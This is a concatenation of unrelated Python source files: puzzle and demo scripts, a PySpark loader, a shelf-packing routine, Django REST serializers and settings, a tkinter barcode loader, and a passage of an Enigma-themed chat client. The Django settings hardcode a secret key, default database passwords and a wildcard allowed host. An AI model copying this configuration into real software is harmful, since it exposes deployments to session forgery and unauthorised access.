    tail = recipes.scores()[num_recipes:num_recipes + 10]
    return ''.join(map(str, tail))
# wow did part 2 ever not need these data structures... thought I was doing myself a solid building those XD
def part2(sequence):
    # Count how many recipes precede the first occurrence of `sequence`.
    # The window checked is slightly wider than the target because each
    # round can append one OR two new scores.
    recipes = Recipes()
    add_new_recipes(37, recipes)
    check_size = len(sequence) + 2
    elf1_recipe = recipes.first_recipe
    elf2_recipe = elf1_recipe.next
    finished = False
    while not finished:
        s1, s2 = elf1_recipe.score, elf2_recipe.score
        new_scores = s1 + s2
        add_new_recipes(new_scores, recipes)
        elf1_recipe = elf1_recipe.move_ahead(s1 + 1)
        elf2_recipe = elf2_recipe.move_ahead(s2 + 1)
        if sequence in recipes.last_x(check_size):
            finished = True
    print recipes.size
    recipes.print_last_x(check_size)
|
22,485 | 1780e5eb40eae5e62f6171aaa2a658a69141fb8f | import random
class Dice:
    """A fair six-sided die."""

    @staticmethod
    def roll():
        """Return a uniformly random face value from 1 to 6."""
        faces = (1, 2, 3, 4, 5, 6)
        return random.choice(faces)
# Demo: roll two dice, draw a value from a random range, shuffle a list.
d1 = Dice()
d2 = Dice()
print("Dice 1 : ", d1.roll())
print("Dice 2 : ", d2.roll())
print('Random range 0-9: ', random.randrange(10))
lst = [1, 2, 3]
random.shuffle(lst)  # shuffles in place; returns None
print('Random shuffle :', lst)
from pyspark.sql import SparkSession
from pyspark.sql.types import IntegerType, LongType, StructField, StructType
import time

# Wall-clock timing of the whole job.
s = time.time()

# Schema for the MovieLens 100k ratings file (tab-separated, no header).
# NOTE(review): this schema is defined but never passed to spark.read.csv
# below, which relies on inferSchema=True instead -- confirm which is intended.
schema = StructType([
    StructField("user", IntegerType()),
    StructField("movie", IntegerType()),
    StructField("rating", IntegerType()),
    StructField("time_stamp", LongType())
])

# 1. Initialize spark session
spark = SparkSession \
    .builder \
    .appName("MovieSimilarities") \
    .getOrCreate()

df = spark.read.csv('ml-100k/u.data', sep='\t', ignoreTrailingWhiteSpace=True, inferSchema=True)
# (An exploratory self-join for movie-pair similarities was drafted here but
# is currently disabled.)
df.show()
spark.stop()

e = time.time()
print("Time: %f s" % (e - s))
22,487 | 5e95f2130166b5b1094407b38fdf351c36a90009 | import copy
import math
import json
# Sample input: shelves ("shells") with their remaining space, and the goods
# to place. Dimensions: width x height define the footprint, tall is depth.
shells = [
    { "_id": 1, "value": 2, "remainingSpace": {"width": 12, "height": 4, "tall": 20} },
    { "_id": 2, "value": 5, "remainingSpace": {"width": 12, "height": 6, "tall": 20} },
]

goods = [
    { "_id": 1, "width": 2, "height": 2, "tall": 15, "quantity": 7, "value": 1, "rotated": False },
    { "_id": 2, "width": 2, "height": 4, "tall": 10, "quantity": 3, "value": 2, "rotated": False },
    { "_id": 3, "width": 3, "height": 2, "tall": 10, "quantity": 3, "value": 5, "rotated": False },
    { "_id": 4, "width": 3, "height": 5, "tall": 25, "quantity": 3, "value": 1, "rotated": False },
]
def rotate(good):
    """Swap a good's footprint in place (90-degree rotation)."""
    good["height"], good["width"] = good["width"], good["height"]
def get_min_area(g, s, rot=False):
    """Return the shelf floor area good `g` would occupy on shelf `s`,
    optionally rotated 90 degrees.

    Works on a deep copy, so neither `g` nor `s` is modified.
    Assumes the good fits at least one per column (column_capacity >= 1);
    otherwise this raises ZeroDivisionError.
    """
    g = copy.deepcopy(g)
    if rot:
        rotate(g)
    # How many items stack in one column, and how many columns are needed
    # for the full quantity. (BUG FIX: removed the unused `rows` variable.)
    column_capacity = s["remainingSpace"]["height"] // g["height"]
    placed_goods_per_column = min(column_capacity, g["quantity"])
    cols_used = math.ceil(g["quantity"] / placed_goods_per_column)
    return s["remainingSpace"]["height"] * cols_used * g["width"]
def placement(shells, goods):
    """Greedily place goods onto shelves, most valuable shelf first and
    goods ordered by value density (value per footprint area).

    Returns a JSON string with per-shelf placement matrices plus the goods
    that were too tall for a shelf. Inputs are deep-copied, not modified.
    """
    total_shells = []
    matrix = []
    tallGoods = []
    shs = copy.deepcopy(shells)  # copy of dict
    gds = copy.deepcopy(goods)
    shs.sort(key=lambda x: x["value"], reverse=True)
    gds.sort(key=lambda x: x["value"] / (x["width"] * x["height"]), reverse=True)
    for sh in shs:
        for g in gds:
            # Too tall for this shelf: remember it and move on.
            if g["tall"] > sh["remainingSpace"]["tall"]:
                tallGoods.append(g)
                continue
            is_fit = sh["remainingSpace"]["height"] >= g["height"] and sh["remainingSpace"]["width"] >= g["width"]
            is_fit_rotated = sh["remainingSpace"]["width"] >= g["height"] and sh["remainingSpace"]["height"] >= g["width"]
            if (is_fit or is_fit_rotated):
                # Prefer whichever orientation wastes less floor area.
                if (is_fit and not is_fit_rotated):
                    rot = False
                elif (not is_fit and is_fit_rotated):
                    rot = True
                else:
                    rot = get_min_area(g, sh, True) < get_min_area(g, sh)
                g["rotated"] = rot
                if rot:
                    rotate(g)
                # Fill whole columns of this good, bottom to top; padding
                # cells get {"_id": None}.
                column_capacity = sh["remainingSpace"]["height"] // g["height"]
                placed_goods_per_column = min(column_capacity, g["quantity"])
                cols_used = math.ceil(g["quantity"] / placed_goods_per_column)
                for c in range(cols_used):
                    x = len(matrix)
                    matrix.append([{"_id": g["_id"], "good": g, "x": x, "y": c, "rotated": rot} if c + 1 <= g["quantity"] else {"_id": None} for c in range(column_capacity)])
                    placed_goods_per_column = min(column_capacity, g["quantity"])
                    g["quantity"] -= placed_goods_per_column
                    sh["remainingSpace"]["width"] -= g["width"]
                    if (sh["remainingSpace"]["width"] <= 0):
                        break
            else:
                print("Good with id = {} doesn't fit.".format(g["_id"]))
            if (sh["remainingSpace"]["width"] <= 0):
                break
        # Drop fully-placed goods before moving to the next shelf.
        gds = [g for g in gds if g["quantity"] != 0]
        total_shells.append({"_id": sh["_id"], "matrix": matrix})
        print()
    total_shells.sort(key=lambda x: x["_id"])
    return json.dumps({"total_shells": total_shells, "tallGoods": tallGoods})
# Run the sample placement and print the resulting JSON.
print(placement(shells, goods))
22,488 | 6330d4f9891b703ad6bb6f7532546256f3ed002b | from rest_framework import serializers
from .models import Course
class GetAllCourseSerializer(serializers.ModelSerializer):
    # Lightweight listing serializer: id and title only.
    class Meta:
        model = Course
        fields = ('id', 'title')
class CourseSerializer(serializers.Serializer):
    # Plain (non-model) serializer for course payloads.
    # NOTE(review): max_length=12 on both title and content looks unusually
    # small -- confirm the intended limits.
    title = serializers.CharField(max_length=12)
    content = serializers.CharField(max_length=12)
    price = serializers.IntegerField()
22,489 | bf08de2b8f7ee907f68b5a99b45cf54826717f6d | """
Copyright 2018 ООО «Верме»
Настройки проекта outsourcing
"""
import os
import logging
import tempfile
from .settings_local import DEBUG
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i@g+(1qc06b@8ee4*3!f0i9g*28ddsx39gv!nvs9w_(p$)p*cy'
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '*'] # TODO
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'apps.outsource',
'apps.claims',
'apps.shifts',
'apps.employees',
'apps.remotes',
'apps.notifications',
'apps.lib',
'apps.permission',
'apps.config',
'apps.authutils',
'apps.violations',
'apps.easy_log',
'compressor',
'social_django',
'axes',
'saml',
'applogs',
'xlsexport',
'wfm_admin',
'rangefilter',
]
AUTHENTICATION_BACKENDS = (
#'django.contrib.auth.backends.ModelBackend',
'apps.authutils.backends.EmailLoginBackend',
'apps.authutils.backends.UsernameLoginBackend',
'saml.backends.SAMLAuthExt',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
# WARN: http://breachattack.com/, http://breachattack.com/resources/BREACH%20-%20SSL,%20gone%20in%2030%20seconds.pdf
'django.middleware.gzip.GZipMiddleware',
'social_django.middleware.SocialAuthExceptionMiddleware',
)
ROOT_URLCONF = 'wfm.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'wfm.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': os.environ.get('WFM_DB_HOST', '127.0.0.1'),
'NAME': os.environ.get('WFM_DB_NAME', 'out_db'),
'USER': os.environ.get('WFM_DB_USER', 'wfm'),
'PASSWORD': os.environ.get('WFM_DB_PASSWORD', 'wfm'),
},
'userlogs': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': os.environ.get('WFM_DB_HOST', '127.0.0.1'),
'NAME': 'wfm_log',
'USER': os.environ.get('WFM_DB_USER', 'wfm'),
'PASSWORD': os.environ.get('WFM_DB_PASSWORD', 'wfm'),
},
'applogs': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'HOST': os.environ.get('WFM_DB_HOST', '127.0.0.1'),
'NAME': 'app_logs',
'USER': os.environ.get('WFM_DB_USER', 'wfm'),
'PASSWORD': os.environ.get('WFM_DB_PASSWORD', 'wfm'),
},
}
try:
from .settings_local import DATABASES
except ImportError:
pass
DATABASE_ROUTERS = [
'applogs.db_router.LogsDBRouter',
'apps.easy_log.db_router.EasyLogRouter',
'wfm.default_db_router.DefaultDBRouter',
]
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 6,
}
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'ru-RU'
TIME_ZONE = 'Europe/Moscow'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static_collected/")
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
MEDIA_ROOT = os.path.join(BASE_DIR, "media")
MEDIA_URL = '/upload/'
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'compressor-cache': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(tempfile.gettempdir(), 'django_compressor_cache'),
'TIMEOUT': None,
'OPTIONS': {
'MAX_ENTRIES': 1000,
},
},
'axes_cache': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
try:
from .settings_local import CACHES
except ImportError:
pass
COMPRESS_CACHE_BACKEND = 'compressor-cache'
COMPRESS_ENABLED = False
try:
from .settings_local import COMPRESS_ENABLED
except ImportError:
pass
LOGIN_URL = '/auth/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = LOGIN_URL
# -------------------------------------------------------------------------------------------------------------------------
# --------------------------------------------------- АВТОРИЗАЦИЯ ---------------------------------------------------------
# -------------------------------------------------------------------------------------------------------------------------
# Social Auth (social_core/pipeline/__init__.py)
# Доступные способы авторизации
SOCIAL_AUTH_PIPELINE = (
'social_core.pipeline.social_auth.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
'social_core.pipeline.social_auth.social_user',
'saml.pipelines.associate_by_name_id',
'social_core.pipeline.social_auth.associate_user',
)
# SAML error handler - ошибка авторизации
SOCIAL_AUTH_LOGIN_ERROR_URL = '/saml/error?type=login-error'
# SAML error handler - блокированный пользователь
SOCIAL_AUTH_INACTIVE_USER_URL = '/saml/error?type=inactive-user'
# SAML error handler - обрыв подключения
#SOCIAL_AUTH_DISCONNECT_REDIRECT_URL = LOGOUT_REDIRECT_URL
# Информация о приложении
SOCIAL_AUTH_SAML_ORG_INFO = {
"en-US": {
"name": "Verme Identity Provider",
"displayname": "Verme Identity Provider",
"url": "https://verme.ru",
}
}
# Контакты технического специалиста.
SOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {
"givenName": "VERME Info",
"emailAddress": "info@verme.ru"
}
# Контакты поддержки
SOCIAL_AUTH_SAML_SUPPORT_CONTACT = {
"givenName": "VERME Support",
"emailAddress": "support@verme.ru",
}
# Общие параметры SAML-протокола
SOCIAL_AUTH_SAML_SECURITY_CONFIG = {
'wantNameId': True,
'wantAttributeStatement': False,
"logoutRequestSigned": True,
"logoutResponseSigned": True,
"signatureAlgorithm": "http://www.w3.org/2001/04/xmldsig-more#rsa-sha256",
}
SOCIAL_AUTH_LOGIN_REDIRECT_URL = '/'
try:
from .social import *
except ImportError:
pass
# Логи
class F(logging.Filter):
    """Not actually a filter: enriches every record with the IP address and
    the username of the requesting user, so the formatter can include them
    in the log line."""

    def filter(self, record):
        # TODO: this may no longer work -- instead of a request, the record
        # seems to carry a socket here nowadays.
        request = getattr(record, 'request', None)
        if request and hasattr(request, 'user'):  # user
            record.user = request.user
        else:
            record.user = '--'
        if request and hasattr(request, 'META'):  # IP
            x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')
            if x_forwarded_for:
                # NOTE(review): this takes the LAST X-Forwarded-For entry
                # (nearest proxy); the client address is usually the first
                # entry -- confirm this matches the proxy setup.
                record.ip = x_forwarded_for.split(',')[-1]
            else:
                record.ip = request.META.get('REMOTE_ADDR')
        else:
            record.ip = '--'
        return True
try:
os.mkdir(os.path.join(BASE_DIR, 'logs'))
except FileExistsError:
pass
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'filters': {
'main': {
'()': F
}
},
'formatters': {
'stamp': {
'format': '%(levelname)s [%(asctime)s] %(ip)s "%(user)s" %(name)s.%(module)s %(message)s'
},
},
'handlers': {
'file_main': {
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, 'logs', 'main.log'),
'formatter': 'stamp',
'filters': ['main'],
},
'console': {
'class': 'logging.StreamHandler',
'formatter': 'stamp',
'filters': ['main'],
},
'db': {
'class': 'applogs.handlers.DBLogsHandler',
'filters': ['main'],
},
},
'loggers': {
'django': {
'handlers': ['file_main', 'console'],
'level': 'WARNING',
},
'apps': {
'handlers': ['file_main', 'console'],
'level': 'DEBUG',
},
'command': {
'handlers': ['db', 'console'],
'level': 'DEBUG',
},
'api': {
'handlers': ['db', 'console'],
'level': 'DEBUG',
},
'remote_service': {
'handlers': ['db', 'console'],
'level': 'DEBUG',
},
},
}
# Admin UI layout description; fall back to empty config when absent.
try:
    from .wfm_admin import ADMIN_COLUMNS, ADMIN_SECTIONS
except ImportError:
    ADMIN_SECTIONS = {}
    ADMIN_COLUMNS = []
DATA_UPLOAD_MAX_MEMORY_SIZE = 100 * 1024 * 1024  # 100 MB (original comment said 10 MB)
DATA_UPLOAD_MAX_NUMBER_FIELDS = 10000
# AXES config
def username_getter(request, credentials):
    """Resolve the username for django-axes lockout tracking.

    Delegates to the app-level implementation; the import is local so app
    code is not pulled in while settings are still being loaded.
    """
    from apps.authutils.views import axes_username_getter
    return axes_username_getter(request, credentials)
AXES_CACHE = 'axes_cache'
# Lock a (user, IP) pair out for 5 minutes after 10 failed attempts.
AXES_COOLOFF_TIME = timedelta(minutes=5)
AXES_FAILURE_LIMIT = 10
AXES_LOCKOUT_TEMPLATE = 'login_locked.html'
AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP = True
AXES_USERNAME_CALLABLE = username_getter
# Determine the client address from the X-Real-IP header only.
AXES_META_PRECEDENCE_ORDER = ('HTTP_X_REAL_IP',)
|
22,490 | c8d840456fbc1abc2dfc3f06f46a21a18fd76f1f | """ LoadJsonWindow Class """
import tkinter.filedialog
from tkinter.messagebox import showerror, showinfo
import copy
import os
from kalmus.tkinter_windows.gui_utils import resource_path, update_graph
class LoadJsonWindow():
    """
    LoadJsonWindow Class
    GUI window for user to load the barcode from existed json file to replace with the barcode in the main window
    """
    def __init__(self, barcode_generator, barcode_1, barcode_2, axes,
                 canvas, barcode_stack):
        """
        Initialize
        :param barcode_generator: The barcode generator
        :param barcode_1: The barcode 1
        :param barcode_2: The barcode 2
        :param axes: The axes of the plotted figure in the main window
        :param canvas: The canvas of the plotted figure in the main window
        :param barcode_stack: The dictionary that stores all the barcode on memory
        """
        self.barcode_generator = barcode_generator
        self.barcode_1 = barcode_1
        self.barcode_2 = barcode_2
        # Set up the axes and canvas
        self.axes = axes
        self.canvas = canvas
        self.barcode_stack = barcode_stack
        # Initialize the window
        self.window = tkinter.Tk()
        self.window.wm_title("Load JSON Barcode")
        self.window.iconbitmap(resource_path("kalmus_icon.ico"))
        # Label prompt for the file name/path to the json file
        filename_label = tkinter.Label(self.window, text="JSON file path: ")
        filename_label.grid(row=0, column=0, sticky=tkinter.W)
        # Text entry for user to type the file name/path to the json file.
        # No textvariable is attached: the widget's own buffer is used via
        # get()/insert()/delete() (the original passed textvariable="",
        # registering a pointless Tk variable).
        self.filename_entry = tkinter.Entry(self.window, width=40)
        self.filename_entry.grid(row=0, column=1, columnspan=2, sticky=tkinter.W)
        # Label prompt for user to specify the type of the barcode they will load
        barcode_type_label = tkinter.Label(self.window, text="Specify Barcode Type: ")
        barcode_type_label.grid(row=1, column=0, sticky=tkinter.W)
        # The variable that stores the type of barcode
        self.type_variable = tkinter.StringVar(self.window)
        self.type_variable.set("Color")
        # The dropdown menu for user to select the type of the loaded barcode
        dropdown_type = tkinter.OptionMenu(self.window, self.type_variable, "Color", "Brightness")
        dropdown_type.grid(row=1, column=1, sticky=tkinter.W)
        # Button to build/load the barcode using the given json file
        self.button_build_barcode = tkinter.Button(self.window, text="Load", command=self.build_barcode)
        self.button_build_barcode.grid(row=2, column=3, columnspan=1)
        # Button to browse the folder
        self.button_browse_folder = tkinter.Button(self.window, text="Browse", command=self.browse_folder)
        self.button_browse_folder.grid(row=0, column=3)
        # Variable that stores which barcode in the main window to replace with
        self.barcode_option = tkinter.StringVar(self.window)
        self.barcode_option.set("Barcode 1")
        # Radio buttons for selecting which barcode in the main window to replace with
        radio_barcode_1 = tkinter.Radiobutton(self.window, text="Barcode 1", variable=self.barcode_option,
                                              value="Barcode 1", anchor='w')
        radio_barcode_1.grid(row=1, column=2, sticky=tkinter.W)
        radio_barcode_1.select()
        radio_barcode_2 = tkinter.Radiobutton(self.window, text="Barcode 2", variable=self.barcode_option,
                                              value="Barcode 2", anchor='w')
        radio_barcode_2.grid(row=2, column=2, sticky=tkinter.W)

    def browse_folder(self):
        """
        Browse the folder to locate the json file
        """
        # Get the file name from the user selection
        filename = tkinter.filedialog.askopenfilename(initialdir=".", title="Select JSON file",
                                                      filetypes=(("json files", "*.json"), ("txt files", "*.txt"),
                                                                 ("All files", "*.*")))
        # Update the file name to the file name text entry
        self.filename_entry.delete(0, tkinter.END)
        self.filename_entry.insert(0, filename)

    def build_barcode(self):
        """
        Build/load the barcode from the json file, store it in the barcode
        stack, replace the selected barcode in the main window and redraw.
        """
        # Get the file name/path to the json file
        filename = self.filename_entry.get()
        # Check if the filename is given
        if not os.path.exists(filename):
            showerror("JSON File Not Exists", "JSON file not exists.\n"
                                              "Please check the JSON file path.")
            return
        # Reading the StringVar cannot fail, so it stays outside the try block
        barcode_type = self.type_variable.get()
        try:
            # Generate the barcode from json file use the barcode generator
            self.barcode_generator.generate_barcode_from_json(filename, barcode_type)
        except Exception:
            # except Exception instead of a bare except: do not silently
            # swallow KeyboardInterrupt/SystemExit
            showerror("Error Occurred in Loading JSON Barcode", "An error occurred in loading the JSON barcode.\n\n"
                                                                "Please make sure the type of Barcode saved\n"
                                                                "in the JSON file is correctly specified.\n"
                                                                "Color or Brightness")
            return
        # Get the name of the json file.  str.rfind returns -1 when '/' is
        # absent, so start_pos is always >= 0 after the +1 (the original's
        # `if start_pos < 0` guard was dead code).
        start_pos = filename.rfind("/") + 1
        # Use that as the key to the newly built/loaded barcode
        barcode_name = filename[start_pos: filename.rfind(".json")]
        self.barcode_stack[barcode_name] = copy.deepcopy(self.barcode_generator.get_barcode())
        # Get which barcode in the main window to replace with
        which_barcode = self.barcode_option.get()
        if which_barcode == "Barcode 1":
            self.barcode_1.__dict__ = self.barcode_generator.get_barcode().__dict__.copy()
            self.barcode_1.__class__ = self.barcode_generator.get_barcode().__class__
        elif which_barcode == "Barcode 2":
            self.barcode_2.__dict__ = self.barcode_generator.get_barcode().__dict__.copy()
            self.barcode_2.__class__ = self.barcode_generator.get_barcode().__class__
        # Clear the plotted axes in the main window
        self.axes[0][0].cla()
        self.axes[1][0].cla()
        self.axes[0][1].cla()
        self.axes[1][1].cla()
        # Always plot the barcode with the longer width below.  Swap both
        # __dict__ and __class__, mirroring the replacement above — the
        # original swapped only __dict__, which could leave a Color barcode
        # carrying Brightness state (and vice versa).
        if self.barcode_1.get_barcode().shape[1] > self.barcode_2.get_barcode().shape[1]:
            temp = copy.deepcopy(self.barcode_1)
            self.barcode_1.__dict__ = self.barcode_2.__dict__.copy()
            self.barcode_1.__class__ = self.barcode_2.__class__
            self.barcode_2.__dict__ = temp.__dict__.copy()
            self.barcode_2.__class__ = temp.__class__
        # Update the graph/plotted figure in the main window
        update_graph(barcode_1=self.barcode_1, barcode_2=self.barcode_2, axes=self.axes)
        # Redraw the main window
        self.canvas.draw()
        # Quit this dialog window
        self.window.destroy()
        showinfo("Barcode Loaded Successfully", "{:s} Barcode has been successfully loaded into the memory.\n\n"
                                                "Name key in memory: {:20s}".format(barcode_type, barcode_name))
|
22,491 | 75ca3d19e0ebcebd5c1397c50e231fc68d29f4e1 | """
Name: Jasmin Maizel
Final Project subject: Cryptography - Enigma
this is the client class file - it connects to the server and handles all the GUI.
Python Version: 3.7.4
Date: 10.02.2021
"""
import socket
import sys
from datetime import datetime
from pickle import dumps, loads
from threading import Thread
from tkinter import Tk, Label, Button, Frame, Entry, END, Scrollbar, Text, OptionMenu, \
BOTTOM, LEFT, RIGHT, DISABLED, NORMAL, Y, RIDGE, StringVar, font
import speech_recognition
from morse import Morse
from rsa_class import RSA_encryption
from canvas_enigma_encryption import ShowEncryption
from enigma import Enigma
class Client:
"""
this class represents the client: its gui and socket.
"""
    def __init__(self, host_ip="127.0.0.1", dst_port=2000):
        """
        Connect to the server, exchange RSA public keys, initialize all
        client-side state, build the Tk root window and start the main loop.

        :param host_ip: server address to connect to
        :param dst_port: server TCP port
        """
        self.my_socket = socket.socket()
        try:
            self.my_socket.connect((host_ip, dst_port))
            print("Connected to server successfully")
        except socket.error:
            print("no server is waiting...")
            sys.exit()
        # creating RSA object and exchanging public keys with the server:
        # receive the server's key first, then send ours
        self.rsa_object = RSA_encryption()
        self.server_key = self.my_socket.recv(8000)
        self.my_socket.send(self.rsa_object.get_public_key())
        # state used by the enigma simulator screen
        self.simulator_enigma = Enigma()
        self.simulator_encryption = []
        self.simulator_encryption_text = ""
        self.log_in_tries = 0
        self.sign_in_tries = 0
        self.username = ""
        # receiver thread (started after log-in) and the inbox it fills
        self.receive_thread = Thread(target=self.receive, daemon=True)
        self.msg_list = []
        # these widgets are used by more than one function and do not always
        # exist, so they are kept as None while not in use
        self.messages_window = None
        self.refresh_button = None
        # guards against starting more than one speech-recognition thread
        self.thread_speech_is_running = False
        # the GUI root object and its properties
        self.root = Tk()
        self.root.protocol("WM_DELETE_WINDOW", self.close_root)
        self.root.resizable(False, False)
        self.root.title("my enigma project")
        self.bg_color = "khaki1"
        self.root.configure(background=self.bg_color)
        # fonts shared by all screens
        self.title_font = font.Font(family="Helvetica", size=20, weight=font.BOLD,
                                    slant=font.ITALIC)
        self.text_font = font.Font(family="Helvetica", size=14, weight=font.BOLD)
        # show the first screen and enter the Tk event loop (blocks)
        self.log_in()
        self.root.mainloop()
def close_root(self):
"""
this is the closing protocol. this function closes all Tk
objects that might exist in order to close the program entirely.
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.root.destroy()
    def after_3_wrong_attempts(self, str_from_where):
        """
        Block the user from signing/logging in for 60 seconds after 3 wrong
        attempts, displaying a countdown, then restore the original screen.

        :param str_from_where: "log in" or "sign in" — which screen to return to
        :return:
        """
        self.clear_screen()
        def timer_tick(seconds):
            """
            Inner helper driving the countdown: updates the label and
            re-schedules itself once per second via Tk's `after`; when the
            countdown hits zero it restores the requested screen.

            :param seconds: seconds remaining in the lockout
            :return:
            """
            if seconds > 0:
                timer_label['text'] = "You had 3 wrong attempts.\nTry again in " + \
                                      str(seconds) + " seconds."
                self.root.after(1000, lambda: timer_tick(seconds - 1))
            else:
                if str_from_where == "log in":
                    self.log_in()
                else:
                    self.sign_in()
        timer_label = Label(self.root, font=self.title_font, bg=self.bg_color)
        timer_label.pack(padx=50, pady=150)
        timer_tick(60)
def log_in(self):
"""
this function shows the log in window
:return:
"""
self.clear_screen()
lbl_log_in = Label(self.root, text="Welcome. Please log in to the system.",
font=self.title_font,
bg=self.bg_color)
lbl_log_in.pack(pady=5, padx=10)
user_name = Label(self.root, text="enter user name", font=self.text_font, bg=self.bg_color)
user_name.pack(pady=5, padx=10)
user_name_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25)
user_name_entry.pack(pady=5, padx=10)
password = Label(self.root, text="enter password", font=self.text_font, bg=self.bg_color)
password.pack(pady=5, padx=10)
password_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
password_entry.pack(pady=5, padx=10)
passcode = Label(self.root, text="enter passcode", font=self.text_font, bg=self.bg_color)
passcode.pack(pady=5, padx=10)
passcode_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
passcode_entry.pack(pady=5, padx=10)
button_enter_log = Button(self.root, text="log in", command=lambda: self.submit_log_in(
user_name_entry, password_entry, passcode_entry))
button_enter_log.pack(pady=10)
button_sign_in = Button(self.root, text="Don't have a user? Sign in", command=self.sign_in)
button_sign_in.pack(pady=10)
    def submit_log_in(self, user_name, password, passcode):
        """
        Send the log-in credentials to the server (RSA-encrypted) and either
        enter the main menu or display the server's error, counting failures
        towards the 3-strike lockout.

        :param user_name: Entry widget holding the username
        :param password: Entry widget holding the password
        :param passcode: Entry widget holding the passcode
        :return:
        """
        username_txt = user_name.get()
        password_txt = password.get()
        passcode_txt = passcode.get()
        # announce the request type first (plain pickled string)
        self.my_socket.send(dumps("log in"))
        # current time as "HHMM" — presumably used server-side to validate a
        # time-based passcode; confirm against the server implementation
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S").split(":")
        time = current_time[0] + current_time[1]
        # wire format: semicolon-separated fields, RSA-encrypted with the
        # server's public key
        str_log_in = username_txt + ";" + password_txt + ";" + passcode_txt + ";" + time
        self.my_socket.send(self.rsa_object.encrypt(str_log_in.encode(), self.server_key))
        response = self.rsa_object.decrypt(self.my_socket.recv(1024)).decode()
        if response == "access granted":
            self.username = username_txt
            self.choose_path()
        else:
            if self.log_in_tries == 2:
                # third failure: reset the counter and lock the screen
                self.log_in_tries = 0
                self.after_3_wrong_attempts("log in")
            else:
                self.log_in_tries += 1
                # flash the server's error message for one second
                lbl_response = Label(self.root, text=response, font=self.title_font,
                                     bg=self.bg_color)
                lbl_response.pack(pady=5, padx=10)
                lbl_response.after(1000, lbl_response.destroy)
            # clear the fields after any failed attempt
            user_name.delete(0, END)
            password.delete(0, END)
            passcode.delete(0, END)
def sign_in(self):
"""
this function shows the sign in window
:return:
"""
self.clear_screen()
lbl_sign_in = Label(self.root, text="Welcome. Please sign in to the system.",
font=self.title_font, bg=self.bg_color)
lbl_sign_in.pack(pady=5, padx=10)
user_name = Label(self.root, text="enter user name", font=self.text_font, bg=self.bg_color)
user_name.pack(pady=5, padx=10)
user_name_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25)
user_name_entry.pack(pady=5, padx=10)
id_label = Label(self.root, text="enter id", font=self.text_font, bg=self.bg_color)
id_label.pack(pady=5, padx=10)
id_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25)
id_entry.pack(pady=5, padx=10)
password1 = Label(self.root, text="create password", font=self.text_font, bg=self.bg_color)
password1.pack(pady=5, padx=10)
password_explanation = Label(self.root, text="please note that the password must "
"contain at\nleast 8 characters, and at least "
"one of each:\ncapital and a small "
"letter, a symbol and a digit", font="none 11",
